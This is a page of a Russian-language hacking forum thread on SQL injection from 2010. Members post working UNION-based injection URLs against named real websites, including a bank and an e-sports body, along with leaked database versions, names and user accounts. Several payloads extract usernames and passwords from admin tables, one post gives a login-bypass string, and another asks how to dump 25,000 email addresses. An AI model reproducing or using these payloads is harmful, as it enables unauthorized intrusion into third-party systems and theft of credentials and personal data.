SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
Page 567 of 798
  1. 4p3

    4p3 Elder - Старейшина

    Joined:
    18 Aug 2008
    Messages:
    142
    Likes Received:
    30
    Reputations:
    0
    Mysql 4.

    http://www.n5md.com/download.php?catno=99999+union+select+1,version(),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7/*
     
    #11321 4p3, 8 Jan 2010
  2. Iron47

    Iron47 Member

    Joined:
    23 May 2009
    Messages:
    0
    Likes Received:
    11
    Reputations:
    -2
    http://www.a4flash.com/showcase2/index.php?category=21+and+1=2+uNiON+aLl+sElEcT+1,2,3,group_concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11--

    - 5.0.87-community:a4flash_web:a4flash_rw@localhost
     
    #11322 Iron47, 8 Jan 2010
    Last edited: 8 Jan 2010
  3. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Code:
    http://www.kzplus.ru/index.php?ch=articles&id=-3523+union+select+1,2,3,4,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,6,7,8,9,10,11,12,13,14--+
    pma: http://kzplus.ru/sql/

    есть форум, но таблу не подобрал(

    ---

    Code:
    http://prodajka.ru/?php=1&module=pages&id=-7+union+select+1,2,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,4,5,6,7,8,9,10,11,12,13+--+
     
    #11323 .:[melkiy]:., 9 Jan 2010
  4. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    http://www.edfashionclothes.com/productlist.php?fid=7&cid=36

    Web Server: Microsoft-IIS/6.0
    Powered-by: ASP.NET
    Powered-by: PHP/5.2.11
    DB Server: MySQL >=5
    -------------------------------------------------------
    http://www.edfashionclothes.com/productlist.php?tid=&fid=7&cid=-36%20union%20select%201,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.columns+--+
    -
    http://www.edfashionclothes.com/productlist.php?tid=&fid=7&cid=-36%20union%20select%201,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19%20from%20information_schema.tables+--+
    -------------------------------------------------------
     
    #11324 Дирижабль, 9 Jan 2010
    Last edited by a moderator: 9 Jan 2010
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    http://www.elfconsulting.ro/showart.php?nrart=-10+UNION+SELECT+1,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),3,4

    Database Version: 5.0.87-community
    Database name: elfconsu_news
    User name: elfconsu_news@localhost
    Os: pc-linux-gnu
     
    #11325 Gorev, 10 Jan 2010
  6. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Korean e-Sports Players Association (KeSPA)
    Code:
    http://www.e-sports.or.kr/teams/team1.kea?m_code=team_14&t_code=P008'or+1=@@version+and+''='
    Code:
    Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 4)
     
    #11326 oRb, 10 Jan 2010
    4 people like this.
  7. Iron47

    Iron47 Member

    Joined:
    23 May 2009
    Messages:
    0
    Likes Received:
    11
    Reputations:
    -2
    Code:
    http://www.pandurii-tg-jiu.ro/index.php?id=5395%20and%201=0%20union%20select%20all%201,2,concat%28version%28%29,0x3a,user%28%29,0x3a,database%28%29%29,4,5,6,7,8,9%20from%20phpbb_users--
    5.0.51a-log:p[email protected]:pandurii_tg_jiu_ro_pandurii
     
    #11327 Iron47, 10 Jan 2010
  8. plutus

    plutus Member

    Joined:
    3 Nov 2008
    Messages:
    25
    Likes Received:
    8
    Reputations:
    1
    http://www.grip tonite.com/games/detail/?game=612+and+version()=5
     
    #11328 plutus, 11 Jan 2010
    1 person likes this.
  9. GinTonic

    GinTonic New Member

    Joined:
    18 Dec 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    1
    4.1.21-pikanta-root@localhost
     
    #11329 GinTonic, 11 Jan 2010
    Last edited: 11 Jan 2010
  10. StarFire

    StarFire Elder - Старейшина

    Joined:
    11 Sep 2008
    Messages:
    118
    Likes Received:
    13
    Reputations:
    1
    Commercial Bank Of Ethiopia :D

    Code:
    http://www.combanketh.com/branchdetail.php?bId=-197+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20--
    /5.1.42
     
    #11330 StarFire, 12 Jan 2010
  11. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    732
    Likes Received:
    646
    Reputations:
    251
    http://www.oknet123.com/rubrique.php?id=-1+union+select+concat_ws(0x3a,user(),database(),version(),@@version_compile_os),2,3,4,5,6,7--+
     
    #11331 Ctacok, 12 Jan 2010
    1 person likes this.
  12. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    Code:
    polevivan@localhost:5.0.84-log:libserv:pc-linux-gnu
    админки :
    #2
    construct@localhost:5.1.39-log:construct:portbld-freebsd7.2
     
    #11332 Strilo4ka, 12 Jan 2010
    Last edited: 12 Jan 2010
    1 person likes this.
  13. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    328
    Likes Received:
    142
    Reputations:
    81
    тут еще кстате скл в авторизации :)
    login: 'or+5=5/*
    password: asdf
    user_blablablaru@localhost:bla-bla-bla_ru:5.0.77
    сообщял им о скуле но никто незакрыл ;)
     
    #11333 warlok, 13 Jan 2010
    2 people like this.
  14. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    Вот маг..
    Знатоки, подскажите, как выдрать целиком колонку, например, email.. там 25к адресов...
    пишите в личку плз...
     
    #11334 sqlinjector, 14 Jan 2010
    1 person likes this.
  15. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    Истчо Маг
     
    #11335 sqlinjector, 14 Jan 2010
  16. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.euphonium.net/discography.php?cdID=-37+union+select+1,2,3,4,5,6,7,8+from+guestbook+--+
    Code:
    http://www.brettbaker.co.uk/main.php?s_id=Soloist&id=93&group=&video_id=-4+union+select+1,2,table_name,4,5,6+from+information_schema.tables+--+
    Code:
    http://www.6degreesfilm.com/reviews.php?id=-811'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a3a,username,password),10,11,12,13,14,15,16,17,18,19,20,21,22+from+users+limit+2,1+--+
    Code:
    http://www.geardownload.com/reviews.php?id=-55399+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+FroM+members+/*+
    Code:
    http://www.truemetal.it/reviews.php?op=albumreview&id=-8529+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+information_schema.tables+--+
    Code:
    http://www.verletzte-helfer.de/reviews.php?op=printpage&artid=-70+union+select+username,password+from+user+limit+1,1+--+
    Code:
    http://www.welsh8ball.com/reviews.php?op=PrintReview&id=-4+union+select+1,2,3,4,5,6,7,8,9+--+
    Code:
    http://membres.multimania.fr/nomad3d/reviews.php?op=PrintReview&id=-1+union+select+1,concat_ws(0x3a3a,aid,pwd),3,4,5,6,7,8,9+from+mpn_authors+--+
    Code:
    http://www.macupdate.com/reviews.php?id=12331&pid=-121925+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,id,perms),11,12,13,14,15,16,17,18,19,20,21+from+admins+--+
    Code:
    http://qclub.uk-pool.com/reviews.php?op=PrintReview&id=-1+union+select+1,2,concat_ws(0x3a3a,aid,pwd),4,5,6,7,8,9+from+mpn_authors+--+
    Code:
    http://www.matheplanet.com/default3.html?call=reviews.php?op=showcontent&id=-455+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15+from+authors+--+&ref=http%3A%2F%2Fwww.google.ru%
    Code:
    http://www.synfulpleasures.com/reviews.php?op=showcontent&id=-119+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7,8,9,10,11+from+user+limit+1,1+--+
    Code:
    http://gehnaindia.com/catalogue.php?CID=2&SCID=-2+union+select+1,concat_ws(0x3a3a,username,password),3,4,5,6+from+sitemanager+--+
    Code:
    http://www.psiconline.it/reviews.php?op=showcontent&id=-25+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwdion+select+1,2,email,4,password+from+admin+--+

    Code:
    http://www.hcandersen-paraden.dk/paraden.php?id=2&contentid=-6'+union+select+concat_ws(0x3a3a,id,brugernavn,kodeord)+from+loginadmin+--+
    Code:
    http://www.hypernova.dk/index.php?setpage=nyheder&setnewsid=-291'+union+select+1,2,3,4,5,6,7,8+--+
    Code:
    http://www.ksknet.dk/side/content.php?sektion=Holdene&id=-474'+union+select+1,2,3+from+users+--+
    Code:
    http://www.caddealer.com/computingsecurity/reviews.php?id=-36+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10+frOm+infOrmation_schema.tAbles+/*+
    Code:
    http://ffejournal.com/articles.php?book=-FFE+%238'+union+select+1,2,3,4,5,6,7,8,9+--+
    Code:
    http://biosilkeborg.dk/show-content.php?id=-1+union+select+1,concat_ws(0x3a3a,userID,username,password,AdministratorRights),3,4+from+users+where+AdministratorRights=1+--+
    Code:
    http://www.kirosydfyn.dk/dynamisk/spg_og_svar/16_spg.php?id=-34+union+select+1,2,3,4,5,6+--+
    Code:
    http://www.substral.se/?page=products&type=products_outdoor&id=-4'+union+select+1,2,3,4,5+from+information_schema.tables+--+&menu=1
    Code:
    http://scae.dk/index2.php?menuid=25&parent=-23+union+select+1,2,3,4,5,6,7,8,9,10,11+--+
    Code:
    http://www.soulportal.dk/reviews.php?op=showcontent&id=-701+union+select+1,2,3,concat_ws(0x3a3a,aid,name,email,pwd,radminsuper),5,6,7,8,9,10,11+from+authors+limit+4,1+--+
    Code:
    http://talkislam.org/ptiming/link_body.php?linkId=-12+union+select+1,2,usr_password+from+tbluser+--+
     
    #11336 DezMond™, 14 Jan 2010
    5 people like this.
  17. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Database Version: 5.0.32-Debian_7etch11-log
    Database name: mnemonic_gosochi
    User name: [email protected]
     
    #11337 RedX, 17 Jan 2010
    1 person likes this.
  18. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    40
    Likes Received:
    13
    Reputations:
    4
    Database Version: 5.0.67-community
    Database name: admin_new_emotion
    User name: admin_alexandros@localhost
     
    #11338 RedX, 17 Jan 2010
    1 person likes this.
  19. sqlinjector

    sqlinjector Member

    Joined:
    31 Dec 2009
    Messages:
    20
    Likes Received:
    6
    Reputations:
    0
    http://www.supportsolutions.co.za/job.php?job_id=-433+union+select+1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--
     
    #11339 sqlinjector, 17 Jan 2010
  20. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    709
    Likes Received:
    729
    Reputations:
    948
    5.0.67-log:u169104:[email protected]:unknown-freebsd6.3
    5.0.32-Debian_7etch11-log:z86577_db:[email protected]:pc-linux-gnu

     
    #11340 Strilo4ka, 17 Jan 2010
    Last edited: 17 Jan 2010
    2 people like this.
(You must log in or sign up to post here.)
Page 567 of 798
Thread Status:
Not open for further replies.
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.